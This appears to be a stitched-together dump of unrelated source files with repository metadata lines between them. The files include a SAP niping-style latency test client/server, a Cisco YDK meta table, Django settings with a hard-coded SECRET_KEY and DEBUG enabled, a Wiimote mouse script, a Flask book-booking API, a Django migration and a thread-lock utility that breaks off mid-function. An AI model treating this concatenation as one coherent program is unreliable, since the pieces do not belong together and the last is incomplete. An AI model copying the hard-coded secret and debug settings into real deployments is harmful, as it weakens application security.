parser = ArgumentParser(usage=usage, description=description, epilog=pysap.epilog)
mode = parser.add_argument_group("Running mode")
mode.add_argument("-s", "--start-server", dest="server", action="store_true",
help="Start server")
mode.add_argument("-c", "--start-client", dest="client", action="store_true",
help="Start client")
target = parser.add_argument_group("Target")
target.add_argument("-H", "--host", dest="host", help="Host")
target.add_argument("-S", "--port", dest="port", type=int, default=3298,
help="Port [%(default)d]")
target.add_argument("--route-string", dest="route_string",
help="Route string for connecting through a SAP Router")
misc = parser.add_argument_group("Misc options")
misc.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Verbose output")
misc.add_argument("-B", "--buffer-size", dest="buffer_size", type=int, default=1000,
help="Size of data-buffer [%(default)d]")
misc.add_argument("-L", "--loops", dest="loops", type=int, default=10,
help="Number of loops [%(default)d]")
options = parser.parse_args()
if not options.server and not options.client:
parser.error("Running mode is required")
if options.client and not (options.host or options.route_string):
parser.error("Remote host is required for starting a client")
return options
def client_mode(options):
""""Implements the niping client running mode
:param options: option set from the command line
:type options: Values
"""
times = []
p = Raw("EYECATCHER" + "\x00" * (options.buffer_size - 10))
try:
# Establish the connection
conn = SAPRoutedStreamSocket.get_nisocket(options.host,
options.port,
options.route_string)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect to server o.k.")
# Send the messages
for i in range(options.loops):
# Send the packet and grab the response
start_time = datetime.now()
r = conn.sr(p)
end_time = datetime.now()
# Check the response
if str(r.payload) != str(p):
logging.info("[-] Response on message {} differs".format(i))
# Calculate and record the elapsed time
times.append(end_time - start_time)
# Close the connection properly
conn.send(Raw())
conn.close()
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
if times:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("send and receive {} messages (len {})".format(len(times), options.buffer_size))
# Calculate the stats
times = [x.total_seconds() * 1000 for x in times]
times_min = min(times)
times_max = max(times)
times_avg = float(sum(times)) / max(len(times), 1)
times_tr = float(options.buffer_size * len(times)) / float(sum(times))
times2 = [x for x in times if x not in [times_min, times_max]]
times2_avg = float(sum(times2)) / max(len(times2), 1)
times2_tr = float(options.buffer_size * len(times2)) / float(sum(times2))
# Print the stats
logging.info("")
logging.info("------- times -----")
logging.info("avg {:8.3f} ms".format(times_avg))
logging.info("max {:8.3f} ms".format(times_max))
logging.info("min {:8.3f} ms".format(times_min))
logging.info("tr {:8.3f} kB/s".format(times_tr))
logging.info("excluding max and min:")
logging.info("av2 {:8.3f} ms".format(times2_avg))
logging.info("tr2 {:8.3f} kB/s".format(times2_tr))
logging.info("")
def server_mode(options):
""""Implements the niping server running mode
:param options: option set from the command line
:type options: Values
"""
if not options.host:
options.host = "0.0.0.0"
sock = socket()
try:
sock.bind((options.host, options.port))
sock.listen(0)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("ready for connect from client ...")
while True:
sc, sockname = sock.accept()
client = SAPNIStreamSocket(sc)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect from host '{}', client hdl {} o.k.".format(sockname[0], client.fileno()))
try:
while True:
r = client.recv()
client.send(r.payload)
except SocketError:
pass
finally:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("client hdl {} disconnected ...".format(client.fileno()))
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
finally:
sock.shutdown(SHUT_RDWR)
sock.close()
# Main function
def main():
options = parse_options()
level = logging.INFO
if options.verbose:
level = logging.DEBUG
logging.basicConfig(level=level, format='%(message)s')
if options.buffer_size < 10:
logging.info("[*] Using minimum buffer size of 10 bytes")
options.buffer_size = 10
# Client running mode
if options.client:
client_mode(options)
# Server running mode
elif options.server:
server_mode(options)
if __name__ == "__main__":
main()
| gpl-2.0 | -3,101,596,490,320,406,000 | 31.950673 | 107 | 0.605607 | false | 4.010917 | false | false | false |
111pontes/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_lpts_ifib_oper.py | 1 | 12672 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
False,
[
_MetaInfoClassMember('entry', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Single Pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('accepts', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to accept
''',
'accepts',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-long', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Long Format
''',
'deliver_list_long',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-short', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Short Format
''',
'deliver_list_short',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination IP Address
''',
'destination_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Key Type
''',
'destination_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-value', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Port/ICMP Type/IGMP Type
''',
'destination_value',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('drops', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to drop
''',
'drops',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('flow-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flow type
''',
'flow_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('ifib-program-time', ATTRIBUTE, 'str' , None, None,
[], [],
''' ifib program time in netio
''',
'ifib_program_time',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-handle', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Interface Handle
''',
'intf_handle',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface Name
''',
'intf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-fgid', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is FGID or not
''',
'is_fgid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-syn', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is SYN
''',
'is_syn',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l3protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 3 Protocol
''',
'l3protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l4protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 4 Protocol
''',
'l4protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('listener-tag', ATTRIBUTE, 'str' , None, None,
[], [],
''' Listener Tag
''',
'listener_tag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('local-flag', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Local Flag
''',
'local_flag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('min-ttl', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Minimum TTL
''',
'min_ttl',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('opcode', ATTRIBUTE, 'str' , None, None,
[], [],
''' Opcode
''',
'opcode',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('pending-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' pending ifib queue delay
''',
'pending_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('sl-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' sl_ifibq delay
''',
'sl_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source IP Address
''',
'source_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-port', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source port
''',
'source_port',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vid', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' VRF ID
''',
'vid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vrf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' VRF Name
''',
'vrf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'entry',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds.SliceId' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId',
False,
[
_MetaInfoClassMember('slice-name', ATTRIBUTE, 'str' , None, None,
[], [b'[\\w\\-\\.:,_@#%$\\+=\\|;]+'],
''' Type value
''',
'slice_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('entry', REFERENCE_LIST, 'Entry' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
[], [],
''' Data for single pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-id',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds',
False,
[
_MetaInfoClassMember('slice-id', REFERENCE_LIST, 'SliceId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId',
[], [],
''' slice types
''',
'slice_id',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-ids',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], [b'([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('slice-ids', REFERENCE_CLASS, 'SliceIds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds',
[], [],
''' Slice specific
''',
'slice_ids',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node',
[], [],
''' Per node slice
''',
'node',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib' : {
'meta_info' : _MetaInfoClass('LptsIfib',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes',
[], [],
''' Node ifib database
''',
'nodes',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'lpts-ifib',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
}
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId.Entry']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node']['meta_info']
_meta_table['LptsIfib.Nodes.Node']['meta_info'].parent =_meta_table['LptsIfib.Nodes']['meta_info']
_meta_table['LptsIfib.Nodes']['meta_info'].parent =_meta_table['LptsIfib']['meta_info']
| apache-2.0 | 5,088,838,015,105,870,000 | 43.463158 | 197 | 0.445786 | false | 3.741364 | false | false | false |
beatrizjesus/my-first-blog | mysite/settings.py | 1 | 2723 | #coding: utf-8
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%=1d%f!jg072%x^01%j6-*_q@a431ep$%o0@59zux)ns3w$ghu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| mit | 6,906,513,009,619,772,000 | 24.688679 | 71 | 0.689313 | false | 3.416562 | false | false | false |
Narcolapser/Little-Mote | wm.py | 1 | 3553 | import cwiid
import time
import uinput
class WiiMote (object):
def __init__(self,addr=None):
#save the wiimote address for later reference
self.addr = addr
#connect to the wiimote
self.mote = None
while self.mote is None:
try:
self.mote = cwiid.Wiimote()
except RuntimeError as e:
print "failed to connect to wiimote."
#for debugging, turn 1 LED on.
self.mote.led = 1
self.ledNum = 1
#prepare the callback list:
self.calls = {
'2':None,
'1':None,
'b':None,
'a':None,
'minus':None,
'home':None,
'left':None,
'right':None,
'down':None,
'up':None,
'plus':None
}
#prep the reactor variable.
self.react = False
#turn on the wiimote's reporting for buttons
self.mote.rpt_mode = cwiid.RPT_BTN
#initialize the mouse controller
self.mouse = uinput.Device([
uinput.BTN_LEFT,
uinput.BTN_RIGHT,
uinput.REL_X,
uinput.REL_Y
])
self.lstate = 0
self.rstate = 0
def start(self):
'''
Start the reactor loop that listens for WiiMote events so the appropriate call back
can be called.
'''
self.react = True
while self.react:
time.sleep(0.01)
bstate = self.mote.state['buttons']
if bstate % 2 and self.calls['2'] is not None:
self.calls['2'](wm)
if bstate / 2 % 2 and self.calls['1'] is not None:
self.calls['1'](wm)
# if bstate / 4 % 2 and self.calls['b'] is not None:
# self.calls['b'](wm)
# if bstate / 8 % 2 and self.calls['a'] is not None:
# self.calls['a'](wm)
if bstate / 16 % 2 and self.calls['minus'] is not None:
self.calls['minus']()
if bstate / 128 % 2 and self.calls['home'] is not None:
self.calls['home']()
if bstate / 256 % 2 and self.calls['left'] is not None:
self.calls['left']()
if bstate / 512 % 2 and self.calls['right'] is not None:
self.calls['right']()
if bstate / 1024 % 2 and self.calls['down'] is not None:
self.calls['down']()
if bstate / 2048 % 2 and self.calls['up'] is not None:
self.calls['up']()
if bstate / 4096 % 2 and self.calls['plus'] is not None:
self.calls['plus']()
leftClick(wm)
rightClick(wm)
def stop(self):
'''
stops the reactor loop.
'''
pass
def release(self):
'''
releases the wiimote, which should effectively turn it off.
'''
pass
def testOut():
print wm.mote.state['buttons']
def callmeMaybe():
print "I was called!"
def countUp():
wm.ledNum = (wm.ledNum + 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 1
wm.mote.led = int(wm.ledNum)
def countDown():
wm.ledNum = (wm.ledNum - 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 16
wm.mote.led = int(wm.ledNum)
def mousetickDown():
mousetick(0,int(wm.ledNum))
def mousetickUp():
mousetick(0,int(-1*wm.ledNum))
def mousetickLeft():
mousetick(int(-1*wm.ledNum),0)
def mousetickRight():
mousetick(int(wm.ledNum),0)
def mousetick(x,y):
wm.mouse.emit(uinput.REL_X,x)
wm.mouse.emit(uinput.REL_Y,y)
def leftClick(wm):
state = wm.mote.state['buttons'] / 8 % 2
if state != wm.lstate:
wm.mouse.emit(uinput.BTN_LEFT,state)
# wm.mouse.emit(uinput.BTN_LEFT,1)
wm.lstate = state
def rightClick(wm):
wm.mouse.emit(uinput.BTN_LEFT,0)
if __name__ == "__main__":
wm = WiiMote()
wm.calls['2'] = testOut
wm.calls['1'] = testOut
wm.calls['b'] = leftClick
wm.calls['a'] = rightClick
wm.calls['minus'] = countDown
wm.calls['home'] = callmeMaybe
wm.calls['left'] = mousetickLeft
wm.calls['right'] = mousetickRight
wm.calls['down'] = mousetickDown
wm.calls['up'] = mousetickUp
wm.calls['plus'] = countUp
wm.start()
| apache-2.0 | 467,865,063,283,979,100 | 21.630573 | 85 | 0.630172 | false | 2.584 | false | false | false |
boar/boar | boar/articles/forms.py | 1 | 2132 | import datetime
import time
from django import forms
from django.contrib.admin.widgets import FilteredSelectMultiple
from boar.articles.models import Article, Tag
from boar.articles.widgets import MarkItUpWidget
class ArticleAdminModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
# Make TagManager act like a ManyToManyField
if 'initial' not in kwargs:
kwargs['initial'] = {}
if kwargs.get('instance', None):
opts = self._meta.model._meta
for f in sorted(opts.fields + opts.many_to_many):
if f.name == 'tags':
if kwargs['instance'].pk is None:
kwargs['initial'][f.name] = []
else:
kwargs['initial'][f.name] = [obj.tag.pk for obj in f.value_from_object(kwargs['instance'])]
super(ArticleAdminModelForm, self).__init__(*args, **kwargs)
if 'pub_date' in self.initial and isinstance(self.initial['pub_date'], basestring):
self.initial['pub_date'] = datetime.datetime(*time.strptime(self.initial['pub_date'], '%Y-%m-%d %H:%M:%S')[:6])
summary = forms.CharField(
required=False,
widget=forms.Textarea(attrs={'id': 'summary', 'rows': '5', 'cols': '80'}),
help_text=Article._meta.get_field('summary').help_text
)
body = forms.CharField(
widget=MarkItUpWidget(),
help_text=Article._meta.get_field('body').help_text
)
tags = forms.ModelMultipleChoiceField(
queryset=Tag.objects.all(),
widget=FilteredSelectMultiple('Tags', False),
required=False,
help_text=Article._meta.get_field('tags').help_text
)
class Meta:
model = Article
class ArticleArchiveForm(forms.Form):
def __init__(self, *args, **kwargs):
qs = kwargs['qs']
del(kwargs['qs'])
super(ArticleArchiveForm, self).__init__(*args, **kwargs)
self.fields['month'].choices = [(d.strftime('%Y-%b').lower(), d.strftime('%B %Y')) for d in qs.dates('pub_date', 'month')]
month = forms.ChoiceField(choices=[])
| bsd-3-clause | 5,179,197,279,134,125,000 | 37.071429 | 130 | 0.596154 | false | 3.911927 | false | false | false |
gekorob/liebraryrest | liebraryrest/api/books.py | 1 | 2344 | import json
from flask import Blueprint, Response, request
from liebraryrest.models import Book, User, Booking
blueprint = Blueprint('books', __name__, url_prefix='/api/books')
@blueprint.route('')
def book_list():
return Response(json.dumps(Book.serialize_list(Book.query.all())),
mimetype='application/json',
status=200)
@blueprint.route('/<book_isbn>')
def book_show(book_isbn):
book = Book.get_by_isbn(book_isbn)
if book is not None:
return Response(book.to_json(),
mimetype='application/json',
status=200)
return Response(json.dumps("No book found with isbn {}".format(book_isbn)),
mimetype='application/json',
status=404)
@blueprint.route('/<book_isbn>/bookings', methods=['POST'])
def booking_on_a_book(book_isbn):
try:
request_body = json.loads(request.data.decode('UTF-8'))
user_id = request_body['user_id']
except (ValueError, KeyError):
return Response(
json.dumps("Invalid JSON or missing user_id param"),
mimetype='application/json',
status=400)
book = Book.get_by_isbn(book_isbn)
user = User.get_by_id(user_id)
if (book is not None) and (user is not None):
booking = Booking.get_by_isbn_and_user_id(book.isbn, user.id)
if booking is not None:
return Response(
json.dumps("This book {} is already on the booking list of user {}"
.format(book.isbn, user.id)),
mimetype='application/json',
status=400
)
if book.is_available():
book.quantity -= 1
book.save()
booking = Booking(book, user)
booking.save()
return Response(booking.to_json(),
mimetype='application/json',
status=201)
return Response(json.dumps("Book {} is not available for booking".format(book_isbn, user_id)),
mimetype='application/json',
status=400)
return Response(json.dumps("Unable to find Book: {} or user: {}".format(book_isbn, user_id)),
mimetype='application/json',
status=404)
| bsd-3-clause | -2,606,883,758,395,606,500 | 34.515152 | 102 | 0.553754 | false | 4.055363 | false | false | false |
CenterForOpenScience/lookit-api | accounts/migrations/0049_two_factor_auth_cleanup.py | 1 | 2863 | # Generated by Django 3.0.7 on 2020-08-04 22:04
from random import choices, randint
from string import ascii_letters, digits, punctuation
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, make_password
from django.db import migrations
# Just want to highlight that we are distinguishing between these two.
ALLAUTH_ACCOUNT_APP = "account"
LOOKIT_ACCOUNTS_APP = "accounts"
def at_least_six(chars):
return choices(chars, k=randint(6, 12))
def generate_valid_password():
"""Generate a random password of at least 18 characters.
Ensures that we're alphanumeric + punctuated.
"""
return "".join(
at_least_six(ascii_letters) + at_least_six(digits) + at_least_six(punctuation)
)
def shim_usable_passwords(apps, schema_editor):
"""Create usable passwords for OSF-based users.
This will force them to do a password reset.
"""
UserModel = apps.get_model(LOOKIT_ACCOUNTS_APP, "User") # noqa
for user in UserModel.objects.filter(
password__startswith=UNUSABLE_PASSWORD_PREFIX, is_researcher=True
):
user.password = make_password(generate_valid_password())
user.save()
DELETE_ALLAUTH_SQL = """
-- Remove Django migrations
DELETE FROM django_migrations
WHERE app IN ('{allauth_account_app_name}', 'socialaccount');
-- Get rid of permissions.
DELETE FROM auth_permission
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Get rid of admin changes.
DELETE FROM django_admin_log
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Delete the content types.
DELETE FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount');
-- Drop tables
DROP TABLE IF EXISTS account_emailconfirmation CASCADE;
DROP TABLE IF EXISTS account_emailaddress;
DROP TABLE IF EXISTS socialaccount_socialtoken CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp_sites CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp CASCADE;
DROP TABLE IF EXISTS socialaccount_socialaccount;
""".format(
allauth_account_app_name=ALLAUTH_ACCOUNT_APP
)
class Migration(migrations.Migration):
dependencies = [
("admin", "0003_logentry_add_action_flag_choices"),
# If we don't add the above, tests will fail due to the fact that
# we use a custom default admin site.
# TODO: Investigate why and where Django's test harness fails to create
# these models, and then either file a bug or use a better fix.
("accounts", "0048_add_otp_model"),
]
operations = [
migrations.RunSQL(DELETE_ALLAUTH_SQL),
migrations.RunPython(shim_usable_passwords),
]
| apache-2.0 | -547,134,564,662,866,400 | 30.119565 | 86 | 0.701013 | false | 3.817333 | false | false | false |
ronaldsantos63/tkGAME | lib/widgets/game_frame.py | 1 | 2161 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
tkGAME - all-in-one Game library for Tkinter
Copyright (c) 2014+ Raphaël Seban <[email protected]>
This program is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program.
If not, see http://www.gnu.org/licenses/
"""
# lib imports
from tkinter import ttk
class GameFrame (ttk.Frame):
r"""
Generic game frame component;
"""
def __init__ (self, master=None, **kw):
# super class inits
ttk.Frame.__init__(self, master)
self.configure(**self._only_tk(kw))
# member inits
self.tk_owner = master
# set widget contents
self.init_widget(**kw)
# end def
def _only_tk (self, kw):
r"""
protected method def;
filters external keywords to suit tkinter init options;
returns filtered dict() of keywords;
"""
# inits
_dict = dict()
# $ 2014-02-24 RS $
# Caution:
# TK widget *MUST* be init'ed before calling _only_tk() /!\
# self.configure() needs self.tk to work well
if hasattr(self, "tk") and hasattr(self, "configure"):
_attrs = set(self.configure().keys()) & set(kw.keys())
for _key in _attrs:
_dict[_key] = kw.get(_key)
# end for
# end if
return _dict
# end def
def init_widget (self, **kw):
r"""
this should be overridden in subclass;
"""
# put here your own code in subclass
pass
# end def
# end class GameFrame
| gpl-3.0 | 929,661,510,890,461,400 | 19.571429 | 69 | 0.585648 | false | 4.130019 | false | false | false |
shivanshu21/docker-volume-vsphere | esx_service/utils/threadutils.py | 9 | 3955 | # Copyright 2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements threading utilities
Written by Bruno Moura <[email protected]>
"""
import threading
import logging
from weakref import WeakValueDictionary
class LockManager(object):
"""
Thread safe lock manager class
"""
def __init__(self):
self._lock = get_lock()
self._lock_store = WeakValueDictionary()
def get_lock(self, lockname, reentrant=False):
"""
Create or return a existing lock identified by lockname.
"""
with self._lock:
try:
lock = self._lock_store[lockname]
# logging.debug("LockManager.get_lock: existing lock: %s, %s",
# lockname, lock)
except KeyError:
lock = get_lock(reentrant)
self._lock_store[lockname] = lock
# logging.debug("LockManager.get_lock: new lock: %s, %s",
# lockname, lock)
# logging.debug("LockManager existing locks in store: %s",
# self._list_locks())
return lock
def _list_locks(self):
return self._lock_store.keys()
def list_locks(self):
"""
Return a list of existing lock names in lock store.
"""
with self._lock:
return self._list_locks()
def get_lock_decorator(reentrant=False):
"""
Create a locking decorator to be used in modules
"""
# Lock to be used in the decorator
lock = get_lock(reentrant)
def lock_decorator(func):
"""
Locking decorator
"""
def protected(*args, **kwargs):
"""
Locking wrapper
"""
# Get lock memory address for debugging
lockaddr = hex(id(lock))
# logging.debug("Trying to acquire lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
with lock:
